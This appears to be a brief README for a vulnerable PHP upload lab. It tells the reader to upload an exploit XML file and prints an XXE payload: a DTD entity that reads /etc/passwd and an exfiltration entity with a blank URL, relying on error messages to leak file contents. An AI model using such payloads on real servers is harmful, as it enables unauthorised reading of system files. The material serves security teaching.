To run the server:
php -S
Navigate to Upload and try to upload file student.xml stored in folder exploit. You can rewrite URL to point to your own DTD, something like this:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM ';'>">
Then check the response and see the error messages. Something interesting to hacker will display ^^